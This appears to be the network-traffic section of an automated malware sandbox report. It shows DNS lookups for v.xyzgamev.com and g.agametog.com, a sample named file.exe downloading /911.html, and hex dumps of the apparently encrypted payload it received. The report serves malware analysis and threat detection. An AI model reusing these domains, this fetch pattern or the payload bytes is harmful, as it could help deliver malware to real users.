                                                          Sep 11, 2022 10:16:26.517201900 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.517330885 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.520237923 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.520275116 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.520589113 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.547173977 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.574359894 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574436903 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574486971 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574558020 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.574579954 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574640036 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.574652910 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574702978 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574773073 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574817896 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574820042 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.574835062 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574877024 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.574929953 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.574970961 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.575048923 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.575200081 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.575566053 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.575582981 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.575608969 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.575733900 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.575797081 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.575877905 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.575932026 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.576055050 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.576227903 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.576241970 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.576303959 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.591779947 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.591876984 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.591922045 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.591952085 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.591976881 CEST44349725104.21.40.196192.168.2.3
                                                          Sep 11, 2022 10:16:26.591989040 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.592015028 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.592036963 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.592715979 CEST49725443192.168.2.3104.21.40.196
                                                          Sep 11, 2022 10:16:26.592745066 CEST44349725104.21.40.196192.168.2.3
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 11, 2022 10:16:23.859339952 CEST5713453192.168.2.38.8.8.8
                                                          Sep 11, 2022 10:16:23.886456013 CEST53571348.8.8.8192.168.2.3
                                                          Sep 11, 2022 10:16:26.448995113 CEST6205053192.168.2.38.8.8.8
                                                          Sep 11, 2022 10:16:26.472578049 CEST53620508.8.8.8192.168.2.3
                                                          Sep 11, 2022 10:16:32.588133097 CEST5604253192.168.2.38.8.8.8
                                                          Sep 11, 2022 10:16:32.588891029 CEST5963653192.168.2.38.8.8.8
                                                          Sep 11, 2022 10:16:32.610487938 CEST53596368.8.8.8192.168.2.3
                                                          Sep 11, 2022 10:16:32.765250921 CEST53560428.8.8.8192.168.2.3
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Sep 11, 2022 10:16:23.859339952 CEST192.168.2.38.8.8.80x51ebStandard query (0)v.xyzgamev.comA (IP address)IN (0x0001)
                                                          Sep 11, 2022 10:16:26.448995113 CEST192.168.2.38.8.8.80x91cStandard query (0)v.xyzgamev.comA (IP address)IN (0x0001)
                                                          Sep 11, 2022 10:16:32.588133097 CEST192.168.2.38.8.8.80xb664Standard query (0)g.agametog.comA (IP address)IN (0x0001)
                                                          Sep 11, 2022 10:16:32.588891029 CEST192.168.2.38.8.8.80xfe29Standard query (0)g.agametog.com28IN (0x0001)
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Sep 11, 2022 10:16:23.886456013 CEST8.8.8.8192.168.2.30x51ebNo error (0)v.xyzgamev.com172.67.188.70A (IP address)IN (0x0001)
                                                          Sep 11, 2022 10:16:23.886456013 CEST8.8.8.8192.168.2.30x51ebNo error (0)v.xyzgamev.com104.21.40.196A (IP address)IN (0x0001)
                                                          Sep 11, 2022 10:16:26.472578049 CEST8.8.8.8192.168.2.30x91cNo error (0)v.xyzgamev.com104.21.40.196A (IP address)IN (0x0001)
                                                          Sep 11, 2022 10:16:26.472578049 CEST8.8.8.8192.168.2.30x91cNo error (0)v.xyzgamev.com172.67.188.70A (IP address)IN (0x0001)
                                                          Sep 11, 2022 10:16:32.765250921 CEST8.8.8.8192.168.2.30xb664No error (0)g.agametog.com34.142.181.181A (IP address)IN (0x0001)
                                                          • v.xyzgamev.com
                                                          • pp.abcgameabc.com
                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.349724172.67.188.70443C:\Users\user\Desktop\file.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:16:24 UTC0OUTGET /911.html HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                          Host: v.xyzgamev.com
                                                          2022-09-11 08:16:24 UTC0INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:16:24 GMT
                                                          Content-Length: 571230
                                                          Connection: close
                                                          Last-Modified: Mon, 29 Aug 2022 04:55:04 GMT
                                                          ETag: "8b75e-5e75a112fbded"
                                                          Accept-Ranges: bytes
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v2ZIR6kCSH4Qg784br1UP52PsJF%2F0z7%2Blpknn17EHw61et6z9XiKnm64pGw0TCL%2FzTOh%2F49d5HnLFluZysqJ93RsisW80q4y3mF0zL%2F9iylywgFSojgNPBBhaXGoAYspFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef6094dbfd178-LHR
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:16:24 UTC0INData Raw: 50 2c cc 00 48 68 a2 6a 1e ff 91 3f e8 eb cf 4f 7d 33 e8 e1 38 76 2c 29 63 6d 6c 91 54 2f f0 cc da e3 13 56 f7 72 dc 93 17 ef b9 d6 f6 6e a7 3f 79 0d 18 6f 7a 23 56 af da b4 fe ed f5 98 4e ff 7b 1f d0 a6 ee ed e2 21 f0 cc cb f9 59 17 22 e3 9a d9 29 76 85 54 92 2e d7 2e dd 9b 1f e8 dc a4 ee 55 62 a7 56 d4 d4 2a db a9 29 c5 95 9d 38 94 ca 85 2c 17 25 16 7b 34 c2 79 57 72 41 ec 61 33 36 26 1a 18 2c e3 bc fe 18 56 f0 be ea f2 a2 6c 39 fc 79 0d c0 a4 e6 33 39 fc 79 0d ca 07 77 57 a6 6a f4 6f 78 ae 06 0d f6 e7 49 9f 9c 3b 86 aa 25 f7 11 70 b7 62 0c e8 3e da cb 6a a7 82 b6 92 a6 6a 1e 88 61 77 54 92 dc 72 a2 86 a6 6a 2e a6 12 17 6f f7 2f c5 8e 37 d4 17 dd 9a 2c 3d 75 6b a7 e1 69 df d2 2f 68 e1 eb a3 a6 6a 2a 6a ee 50 a6 6a 09 c4 88 3f e2 a5 2d 58 11 6b a7 d2 52
                                                          Data Ascii: P,Hhj?O}38v,)cmlT/Vrn?yoz#VN{!Y")vT..UbV*)8,%{4yWrAa36&,Vl9y39ywWjoxI;%pb>jjawTrj.o/7,=uki/hj*jPj?-XkR
                                                          2022-09-11 08:16:24 UTC1INData Raw: a7 6a f4 6f c2 af d8 ae 06 0d 6c 26 fc fa 25 f3 55 44 e3 2e 60 e8 02 c6 eb 26 eb e1 74 3e 22 96 36 67 fa de a7 6a 2c a2 d4 d1 e2 2f 57 3d 00 fa 35 a6 16 15 6e 14 f1 00 2e be 0a 11 58 0e cf 99 68 3e cb 9f 6b c7 c4 27 e8 96 2e c8 7c 2f 68 e1 a5 ec a7 6a 66 44 58 f3 53 ef d4 1f 60 26 2a e4 f4 c4 59 e7 d4 bc 0e 14 29 55 5d 62 63 5b fa 04 16 14 1b 15 27 28 86 89 6c e5 db af 2b f1 c5 bc 0a a9 62 17 69 d3 d6 db 8b f3 5b e7 d4 a6 c0 49 66 21 53 e7 d4 96 c0 72 2e a6 16 e8 ec dc 69 db da 96 2e 1d 14 51 5e 13 e4 ae 2a a6 16 91 16 d3 61 65 64 64 54 dd 60 95 27 95 d2 ee dd 9c 2a 13 5b e3 68 af da a4 1e 95 65 90 d9 c3 3f 3e 0c a4 1a d2 6e a6 1a a9 db 35 cd db ef b2 ec f7 f0 b7 2d ae 19 6a a7 a6 54 f5 a6 6f 77 04 1f f4 ef ac 12 19 6b 09 0e e3 eb 2d 1f d1 bb f1 6b 31 36
                                                          Data Ascii: jol&%UD.`&t>"6gj,/W=5n.Xh>k'.|/hjfDXS`&*Y)U]bc['(l+bi[If!Sr.i.Q^*aeddT`'*[he?>n5-jTowk-k16
                                                          2022-09-11 08:16:24 UTC2INData Raw: 29 7b cb d8 b4 1a 01 1d 53 d2 db e0 2a 70 f5 2f ec e2 df 54 67 fb 36 e2 4c 14 c9 a0 6a 6b 82 f5 94 e4 d5 53 3d dc 53 cc 68 5a c2 0e 42 f5 2f 12 0c e7 6a a2 c3 8f d5 cf ea 27 6a f4 6f 0e c0 2e 85 54 41 4f 5a 54 ea bc 6e a6 bf c9 d2 39 1f fd 85 a4 32 35 fd a2 b7 c3 1b 6a 67 af 5c 91 62 ae 5c 7c 0b 58 1a a7 e8 42 43 ea 6d a1 2a df 56 af 05 41 a2 0a 8a a5 49 8d 61 a6 65 a9 6a 85 4c a3 6a a5 10 dc 1f 6f b7 c6 68 a7 7a 8a d7 37 3a 67 e3 2f ef 22 ee a2 63 ab 6f 24 6a 2b e0 21 69 47 8f a2 6a a5 79 56 8a a7 68 a5 2a e7 64 a9 7e 32 fe bc 64 22 ec a5 75 3c db 93 6a 3b ed b4 67 a2 3e 73 f8 b5 fa 32 6f a9 84 c6 e8 a3 60 29 ed 03 cf a2 fa 37 5c 91 6a 77 43 5a 6e 9f d1 a9 ea 22 e5 a8 98 59 6e e7 a3 21 fc be b9 bc 24 a8 6b 3c fc 98 70 87 41 83 a4 41 8c 5c d0 25 21 e7 43
                                                          Data Ascii: ){S*p/Tg6LjkS=ShZB/j'jo.TAOZTn925jg\b\|XBCm*VAIaejLjohz7:g/"co$j+!iGjyVh*d~2d"u<j;g>s2o`)7\jwCZn"Yn!$k<pAA\%!C
                                                          2022-09-11 08:16:24 UTC4INData Raw: b6 4a 0c a4 0a bf 5a 2a 1d 25 e7 67 60 e3 f5 ae 16 1b 97 3a cb 30 f9 7a 60 80 a2 da 07 6e bc b5 75 f1 68 ce 59 c6 36 7b 68 e3 01 8b 97 78 54 85 e2 15 23 d8 1b 65 14 1d f3 ba 51 3c 13 71 8b eb f5 7f 92 7c 96 9f 55 0a c0 ed 52 85 62 6b ca 99 3c 71 c7 8b b6 8d cf 6b 7a 21 90 21 13 1a c2 5e 76 90 fc b0 69 3f d7 4d 95 0b 9b c9 f5 74 52 51 69 7d 4a 57 a7 4a 04 d2 9c 1f d8 15 d1 79 b7 6a 22 19 25 ec de ac e6 de 1f b9 39 45 d5 8d b1 06 6b 23 a3 a1 25 fd 68 b6 8c 86 a2 e1 ed ff a0 fa 39 dc 4a 2a 92 31 8e 90 bf dd 75 10 2c 57 11 e6 d5 3b e7 6e e3 35 1f 9e fc 1a 49 ec a7 4b 16 df d5 c2 2d 13 9b 74 c9 7a 7c a2 ec 9d 88 ba ab 7a b3 e9 69 3b f3 3b a3 f4 61 37 d3 87 28 ce 0b ed 17 33 f4 28 dc 70 17 ca f0 d5 3f 5e c2 57 bf d8 1a b3 65 eb 75 43 cd da 0c d1 a7 db 46 99 b4
                                                          Data Ascii: JZ*%g`:0z`nuhY6{hxT#eQ<q|URbk<qkz!!^vi?MtRQi}JWJyj"%9Ek#%h9J*1u,W;n5IK-tz|zi;;a7(3(p?^WeuCF
                                                          2022-09-11 08:16:24 UTC5INData Raw: aa 28 19 5f 53 cb 33 a4 e3 fa b1 a7 6a a7 e1 e3 8e 7b 17 29 60 a9 e7 63 22 92 d6 6d a0 6e 2b 58 ae c9 33 d9 f7 a1 42 67 6b be cb cc f4 88 18 40 76 4c ab 9c 96 2a 23 e6 2b 69 66 66 43 50 76 66 ab 67 f9 d7 c3 6b 23 43 db fe 22 bc b2 2c 92 d2 a2 ee 30 a1 6d 18 82 f1 73 ea 68 24 2d 77 fb 32 ba 68 e1 aa 63 3c 26 18 76 d1 d5 9b 63 ab a8 24 3c bb 67 eb 70 18 f4 4a d7 8f ed 08 45 28 ca f6 0e a3 29 18 2e 86 c4 a9 74 54 aa 9e 16 ee 10 f7 cc 13 66 9f e2 6f 11 d9 23 d9 ee ba 83 bf 70 e5 78 7a a2 1e c6 a4 79 b1 d4 22 ff a0 6a d9 a9 0d 83 26 a8 6e 9c 26 1d 59 13 26 67 6a cb 21 01 61 e8 16 9e af e2 27 e9 e2 a6 6a e8 0e 07 22 e6 e8 e8 12 9b a5 81 b2 0c bc 95 d8 27 12 a1 46 b7 1e 9d da 56 2c ac 1a 12 2e 2a 6d a4 a2 c6 c2 ae 1a b1 44 a2 84 0d c3 80 e0 a6 e7 3b 77 ca 6f 57
                                                          Data Ascii: (_S3j{)`c"mn+X3Bgk@vL*#+iffCPvfgk#C",0msh$-w2hc<&vc$<gpJE().tTfo#pxzy"j&n&Y&gj!a'j"'FV,.*mD;woW
                                                          2022-09-11 08:16:24 UTC6INData Raw: 2a e9 ff c5 09 f3 67 e9 ab 7c 3c ed b5 a4 f6 d8 14 4d 82 d0 1f da 1d ec a5 b4 f6 e3 63 11 6d 74 44 3a e9 75 02 cc a5 66 27 68 67 74 f6 5b 16 7b 33 86 4f 56 ae 0e f9 32 f5 06 5f 2a 57 20 cc 01 cd 02 4b 2e 18 25 d1 fb f5 2f 1e 34 b0 f2 5c 51 6f 1b 77 68 74 bb 16 0e 72 eb 5f f0 ce ea 53 a3 c0 9a 51 bd 2b e3 e2 d2 0b 35 2a dc 26 f7 63 22 e7 08 f4 3c b1 5b 86 aa 47 4a ae 9a 37 32 b2 4e 95 90 eb 2f e7 b5 f7 fc ff f5 72 20 77 3a eb 43 90 2f a0 7f d2 5b 2c 10 a9 80 5f 76 19 ac dc 8e f1 26 93 c7 33 1e d2 7b ab 3f 6f 82 47 32 6a 1f 43 a6 e7 00 2d 8a 58 80 9a 06 c3 18 b7 31 be 69 86 4f 12 f6 d7 f7 ef f4 b6 7f e6 55 5b ba cc 5e 0e dd 04 ca 8a 86 64 7e ad 44 a2 9c 35 24 4b 81 ed 89 0d 83 4b b0 67 ee 55 3d 21 cf ab 33 1f e0 f0 5e ba 7a af e5 4e 1e f2 63 bc c4 08 1e bf
                                                          Data Ascii: *g|<McmtD:uf'hgt[{3OV2_*W K.%/4\Qowhtr_SQ+5*&c"<[GJ72N/r w:C/[,_v&3{?oG2jC-X1iOU[^d~D5$KKgU=!3^zNc
                                                          2022-09-11 08:16:24 UTC8INData Raw: 75 07 42 a8 e2 9b df a9 79 22 7b b3 f5 ab 51 1b 7e 36 2f 13 1e b4 29 1f 41 4a 46 a5 e9 bc 36 67 a9 62 4c 83 40 8d e1 2e 2c a3 a9 e4 ae f3 d2 a2 84 92 d5 2f 6e fe 7f 63 62 0e b9 a7 6a d8 2c 26 29 a3 3a 1f 69 4c 46 83 e9 a9 cb 83 65 c2 00 f7 b1 3c 72 50 c4 ee 75 ad 77 48 c7 f7 64 a8 64 27 b0 94 64 cc 39 f5 3a 7c d1 68 c3 d5 c5 e3 a1 4b d4 f0 5f 63 71 4e 5b 62 84 34 64 3e 76 9d 50 24 ef 2a e9 1f 8a 08 c4 fe 61 8a 4d a1 45 8c 7e b8 27 12 19 ea f3 a6 07 59 a7 fc d9 b0 b8 88 68 2c 04 62 17 38 a4 ab a6 6c 6d f1 b7 3c 8b dd 6f 91 d2 88 c0 eb d7 c3 35 63 77 f5 2f 22 bc 01 5b e2 e1 2d 39 a4 c4 08 4e 56 4f c7 d2 e5 db aa ed a9 0d cf 66 c1 42 67 bf d4 4e ad 45 81 63 29 8e 8b 3e 34 67 95 de a8 e7 2b 78 88 90 6e ef e2 f4 f6 fc ff 20 ed ab 64 9a 54 f4 3a fc 79 0d 4b 3c
                                                          Data Ascii: uBy"{Q~6/)AJF6gbL@.,/ncbj,&):iLFe<rPuwHdd'd9:|hK_cqN[b4d>vP$*aME~'Yh,b8lm<o5cw/"[-9NVOfBgNEc)>4g+xn dT:yK<
                                                          2022-09-11 08:16:24 UTC8INData Raw: d2 a2 16 52 03 45 87 d1 fb e0 6d 21 69 db de b2 0a 52 2e 6f 8c 07 6d 6b 60 71 fb 13 ac af 5e 7a 58 ca e7 e1 61 2f 6c ce c2 7e 32 79 77 a1 69 d7 d2 b2 02 5a 00 05 22 2d 0a 88 a2 e4 e9 ba ba b2 0e 56 74 08 39 b6 ec 39 34 b3 ce c2 3d d0 09 a4 7f d9 69 d3 da e4 69 98 d1 6c 9c 18 ad 95 2d f7 b0 46 4f a6 24 b2 18 3f 21 a9 44 a8 07 ec 84 3a d0 4d c8 dd 2d 13 6b a0 c5 82 e6 e5 e9 e9 c5 b5 39 f0 bd 79 4f 34 e2 ea e2 87 40 fc fd 09 02 65 0e cc 02 b2 bf 26 ad 44 af 68 e0 57 9a d7 d7 e3 eb d3 12 4c ec 19 a6 bf ef f2 bd 5d d9 65 e6 5a 31 a1 ac 2a 90 b6 51 1f 24 e1 e9 20 98 a8 2d 42 77 e7 a1 51 5b da 85 14 74 2a b4 c1 0d 6a 27 b7 bf 44 9c 92 a5 e1 d6 51 89 9a bb 93 66 51 e9 2c da 17 fe b0 e2 4c 4d 71 7f 94 9e e1 26 19 55 e3 a5 a4 ef ec 61 a1 fa 0f 46 7f 21 29 b1 bf 2a
                                                          Data Ascii: REm!iR.omk`q^zXa/l~2ywiZ"-Vt994=iil-FO$?!D:M-k9yO4@e&DhWL]eZ1*Q$ -BwQ[t*j'DQfQ,LMq&UaF!)*
                                                          2022-09-11 08:16:24 UTC10INData Raw: 7e 43 a9 37 6f fb a3 9b 99 68 5a a7 9e 63 b2 7f 34 e9 c1 d4 11 eb a2 73 b6 de 18 a3 e1 d4 79 6b c6 72 20 38 e9 64 70 9f d2 d1 e7 fa 7a 91 7b 8d bb 56 d6 c2 c1 ee 80 bc 7c 31 32 f2 db 82 05 d4 d0 c9 bb 26 9f fc c8 6d 2c f6 d2 fa 0f 6b 56 0c 29 e6 ae 06 32 3d af 78 5f a7 6d e4 27 26 a6 ea a4 24 6f 1b 94 e5 7a 1f 11 24 78 2c e5 e4 de 57 eb 27 6a 1f 6f 2d 5d 63 be 74 6d 61 e3 59 f7 be f4 08 84 dd 63 f6 36 a5 26 5b 9d b6 8e 52 7d ac 53 84 a2 08 fe 0f 39 ec 68 a4 bf cb f3 26 b0 0e 2d 6f ed c5 e4 70 e7 67 68 a7 ee b8 ca 60 6f a0 3d f5 5d 5d 22 68 61 0e 0f 28 e5 3e 04 cd f7 70 57 e4 48 2e 11 17 19 54 cc 48 e7 fd 0b aa 50 c9 0c 06 c3 56 96 7f 4b a4 90 90 78 b1 dd 17 5f a5 3c a7 d2 ec 6c 52 13 91 c6 03 2c f6 9a 40 cd 49 c4 19 73 7b 9f f9 5a 8c a8 51 e7 c4 4d ea b4
                                                          Data Ascii: ~C7ohZc4sykr 8dpz{V|12&m,kV)2=x_m'&$oz$x,W'jo-]ctmaYc6&[R}S9h&-opgh`o=]]"ha(>pWH.THPVKx_<lR,@Is{ZQM
                                                          2022-09-11 08:16:24 UTC11INData Raw: 44 74 a5 e1 ec 4f 1f f5 61 6e 6b a1 a0 aa 10 0d e6 6d 7a 10 16 37 b5 d3 11 6b 66 cb b1 27 62 b1 06 8b fd 64 97 7a 5f d0 35 c9 c7 7c 4e fc 8c 2f b6 83 3c 0c 4e 99 bc 7f d8 81 a6 b1 aa 54 ff 66 9b 7a f6 29 ad 9d 4d db 83 c9 0d a5 c9 1c ac 7f f0 be a4 d2 f6 c3 28 4b 4d ae fb 35 6c a0 e4 36 ec 6b 7b 18 e4 d4 e2 ab 31 4f 5d 28 6b 29 62 84 7f 9d 45 87 38 3b 91 44 75 a9 e7 b3 1e 36 53 02 06 a4 d8 d0 23 cc 84 2d 67 5d 62 de a4 04 48 36 1a 0a fe 7d b7 31 e3 6a b9 1e cd 72 e8 55 3f da f2 fd 3b a7 ff ae c8 72 16 e7 12 9d 25 bc 8e a1 17 56 05 ef a3 6b 3a 63 5a de 68 ca 6b 82 c0 84 48 7c 1d 68 87 2c c9 eb 6b c3 8a db 96 27 22 a6 e2 9a 58 d2 51 3b e7 c5 4d f7 2f 2c e5 ef 12 5c cf 02 e5 2d 20 04 b6 80 4e d3 e6 7e b6 03 cf e1 f4 3b 73 d7 48 e1 e3 ef 62 e7 fd bd 6d e7 25
                                                          Data Ascii: DtOankmz7kf'bdz_5|N/<NTfz)M(KM5l6k{1O](k)bE8;Du6S#-g]bH6}1jrU?;r%Vk:cZhkH|h,k'"XQ;M/,\- N~;sHbm%
                                                          2022-09-11 08:16:24 UTC12INData Raw: e7 bc fe a9 7b 32 5b 96 e2 6a 31 bc e5 a9 67 0e d8 34 62 24 64 ae 75 34 66 28 2d a4 bd 03 cf c2 47 96 73 dc 43 81 9e c6 a3 16 f2 4e d2 97 fb 05 f9 00 c6 14 6e 03 ca 25 33 52 1e f7 ea e0 be 48 95 d2 07 40 e0 c6 81 2d 0f 96 ce 37 45 60 68 a7 21 35 b3 ed ee 77 ae 7d 80 f6 ce 48 05 d5 fd 8d c4 06 cb 25 16 59 1d c2 f2 a9 ee b7 57 da 51 f2 02 7b a9 eb 2e b4 d1 f8 0b 8e 6a 28 40 f1 6d cc 08 80 4c 94 ea 17 e1 61 df 6d b1 fa a2 e8 4c f1 72 e8 c7 62 67 e5 a8 1c 34 5f 8e 5c a8 1f d3 c9 fd e3 b8 f8 69 2f 32 f9 95 d7 67 b7 77 25 eb 8a 20 4a e3 26 2b 67 68 c1 89 e2 df 27 b4 5a 31 2a 19 d6 b9 8c 1d 1e 08 c9 d2 28 11 dd 32 19 13 9d 20 48 60 a7 d7 1e 48 85 59 54 92 d8 8d 05 67 3d 3f 37 bb 26 6b 27 eb a6 3b 75 9d 2e 1d e2 f7 1c e8 c5 9e a4 6a 28 9b 22 e3 6f 27 2e 09 09 e0
                                                          Data Ascii: {2[j1g4b$du4f(-GsCNn%3RH@-7E`h!5w}H%YWQ{.j(@mLamLrbg4_\i/2gw% J&+gh'Z1*(2 H`HYTg=?7&k';u.j("o'.
                                                          2022-09-11 08:16:24 UTC14INData Raw: c6 75 a3 6a 30 32 97 b3 7a 7e 09 d4 8f 42 a7 6a 2e 7e be 17 a1 6a 08 fd e8 a1 f0 7e a7 6a 2e 56 9e e6 bd 70 58 80 86 1a e7 7e 34 2d 53 56 26 62 b6 ff 9e 51 c2 5c 08 95 b2 37 ac 2d b3 f3 ab 67 2e 6b 81 cf dc 6d 2d 31 d8 b0 0c 01 e8 e3 af 7c 34 64 c3 3f 88 10 cc 3b 31 ae af 09 26 3f 1a a5 97 6a 07 6b a2 ba 61 07 7f a1 59 4f 01 27 05 09 61 6a a3 02 ce 05 a3 40 18 80 9e 67 86 2f 69 39 c0 d4 a6 05 0e af 24 83 c1 7a b8 e7 a4 14 57 f9 34 51 65 e5 c9 f3 e0 bc b3 2e e7 6a cd 42 b3 6f f1 e6 2e e3 2c 44 32 93 e7 c5 85 62 e2 aa cd 01 a6 45 ee 87 3c 1c fa 40 c3 1f b9 12 44 3d 01 0b d4 87 2c 3a f5 0e fa 00 f4 1d dd 25
                                                          Data Ascii: uj02z~Bj.~j~j.VpX~4-SV&bQ\7-g.km-1|4d?;1&?jkaYO'aj@g/i9$zW4Qe.jBo.,D2bE<@D=,:%
                                                          2022-09-11 08:16:25 UTC14INData Raw: 64 29 63 ed e5 af a3 60 d8 1f 79 87 54 41 49 74 7c 29 a4 22 6e ee e2 a5 2c 4c 05 5e 87 c6 5b 2f 86 c7 2b 4b e1 9c 51 ac 8c f0 d0 37 8c fc 3e 24 76 f5 8a 08 76 f4 79 af a3 4b 0b f8 cc 78 43 62 af 6a 01 5e 3f e6 bc 76 e5 0b d7 7d 1f 80 f2 aa 6c ac 1e 4a f6 2d 25 c7 dc b8 29 ed 2e 71 28 aa 1f 42 f5 78 ef 27 92 da f3 26 bc 97 d2 63 83 4c 84 40 2a 71 b0 e9 a9 5b 93 e3 27 a7 fc 71 ab e9 a9 47 8c ed ab e9 a9 43 2a c8 20 62 28 2e 70 fe 96 20 ed ee 97 c4 f7 80 f6 ae 08 45 f9 b1 c2 ca 19 6b a7 c4 7d 6c 2b b9 1f 00 98 02 a3 b2 65 27 4b df fa a4 96 6a 0b b2 dc 65 4d 09 dd a6 6f a7 69 51 57 a8 e5 76 fe e9 f6 e3 f5 64 23 6c 7a 77 61 2f e7 e3 64 20 77 39 f1 b7 59 17 22 62 f6 49 f0 35 a7 c2 7b dc 1b 90 8a fe e1 ee f7 b3 a3 67 d2 60 a7 6a 32 d7 32 57 5c 6e 25 38 b4 20 ea
                                                          Data Ascii: d)c`yTAIt|)"n,L^[/+KQ7>$vvyKxCbj^?v}lJ-%).q(Bx'&cL@*q['qGC* b(.p Ek}l+e'KjeMoiQWvd#lzwa/d w9Y"bI5{g`j22W\n%8
                                                          2022-09-11 08:16:25 UTC15INData Raw: 19 e5 0c 0a 76 ba 76 b2 3e a1 6b 13 d5 38 a3 e5 22 cf 76 12 a4 dc 02 3e e0 bc 3f 35 b8 2d 2a 3c d2 de 3b 7b 9f 80 16 15 6e 10 d8 26 c8 00 3f 47 2a 75 e7 e8 ce 77 b9 e5 23 ab aa 77 bb a6 fa 51 85 ab 53 bb ca c1 35 7c 1a 71 5a cf 65 b0 e3 7a 38 27 f8 3c c9 87 e1 e4 6a 44 80 ae 89 46 79 50 b4 5f 7f e0 5b 49 6a 0b 48 4c 7c 43 ac 1b 15 cb a9 84 28 76 3a 08 e3 e1 5e f5 d4 64 b1 52 ea 06 0d f4 6b 34 cc 8c e7 99 a6 d1 e1 62 23 46 03 65 31 3e b5 15 aa 31 d0 be 5e e8 0d ba 5f 37 0d 71 3e c6 72 ec 14 36 56 34 47 f8 c5 ed de bd 46 f9 6c d8 77 a1 54 93 ea 4f 89 2f 73 38 2e 13 54 e0 33 d1 1f 83 10 ca 3b 95 85 21 df 3c d5 a7 7e 5f 91 28 6d c7 00 99 3f f7 7f e8 38 9e 9d bd c5 8a 35 f7 e7 61 2d 43 78 5e 69 a7 f3 aa ff 59 4f 28 13 99 df 7e 10 36 de df 50 e8 e6 14 1f ed a3
                                                          Data Ascii: vv>k8"v>?5-*<;{n&?G*uw#wQS5|qZez8'<jDFyP_[IjHL|C(v:^dRk4b#Fe1>1^_7q>r6V4GFlwTO/s8.T3;!<~_(m?85a-Cx^iYO(~6P
